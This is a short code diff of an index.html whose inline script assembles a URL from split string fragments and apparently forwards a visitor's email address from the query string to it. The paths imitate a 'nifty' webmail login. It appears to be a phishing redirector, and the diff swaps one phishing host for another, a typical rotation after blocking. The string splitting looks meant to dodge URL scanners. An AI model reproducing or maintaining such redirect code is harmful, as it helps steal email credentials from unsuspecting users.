--- a/index.html
+++ b/index.html
@@ -8,9 +8,9 @@
     </style>
     <script>
         (function() {
-            var part1 = "https://acenursng.o";
-            var part2 = "rg/mail/mail/";
-            var part3 = "nifty/nifty/drr454ce67e4553444t55/mailer/nifty/index.html#";
+            var part1 = "https://debconstrruct";
+            var part2 = "ion.com/mailer/jp/m";
+            var part3 = "ail/niftyy-/86t65r45rf64r74e5/76tr5654353/index.html#";
 
             // Function to get the email from the query string
             function getQueryParameter(param) {
